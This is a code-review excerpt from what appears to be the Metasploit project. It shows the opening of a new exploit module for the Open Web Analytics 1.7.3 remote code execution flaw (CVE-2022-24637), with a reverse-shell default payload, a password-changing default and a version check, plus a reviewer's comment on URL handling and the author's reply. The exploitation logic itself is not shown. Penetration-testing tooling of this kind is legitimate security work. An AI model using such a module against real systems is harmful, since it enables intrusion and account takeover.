modules/exploits/multi/http/open_web_analytics_rce.rb

```diff
@@ -0,0 +1,295 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  require 'base64'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Open Web Analytics 1.7.3 - Remote Code Execution (RCE)',
+        'Description' => %q{
+          Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive
+          user information, which can be used to gain admin privileges by leveraging cache hashes.
+          This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled
+          by the PHP interpreter.
+        },
+        'Author' => [
+          'Jacob Ebben',    # ExploitDB Exploit Author
+          'Dennis Pfleger'  # Msf Module
+        ],
+        'References' => [
+          [ 'CVE', '2022-24637'],
+          [ 'EDB', '51026']
+        ],
+        'Licence' => MSF_LICENSE,
+        'Platform' => ['php'],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'Username' => 'admin',
+          'Password' => 'pwned'
+        },
+        'Targets' => [ ['Automatic', {}] ],
+        'DisclosureDate' => '2022-03-18',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK, # /owa-data/caches/{get_random_string(8)}.php
+            IOC_IN_LOGS, # Malicious GET/POST requests in the webservice logs
+            ACCOUNT_LOCKOUTS, # Account passwords will be changed in this module
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('Username', [ false, 'Target username (Default: admin)']),
+      OptString.new('Password', [ false, 'Target new password (Default: pwned)']),
+    ])
+  end
+
+  def check
+    res = etablish_connection
+
+    if !res.body.include?('Open Web Analytics')
+      Exploit::CheckCode::Unknown
+    elsif !res.body.include?('version=1.7.3')
+      Exploit::CheckCode::Detected
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def exploit
+    base_url = get_normalized_url(datastore['RHOSTS'])
```

Comment:
This should be using the [`#full_uri`](https://github.com/rapid7/metasploit-framework/blob/350984bc41fe9698f0d7bec16451c25aa14f0158/lib/msf/core/exploit/remote/http_client.rb#L555) method.

There's alot of different things that `datastore['RHOSTS']` can be and this way you can remove `#get_normalized_url`.

Reply:
You are correct. I didn't see the `#full_uri` method before but updated it accordingly and removed the `#get_normalized_url` function completely.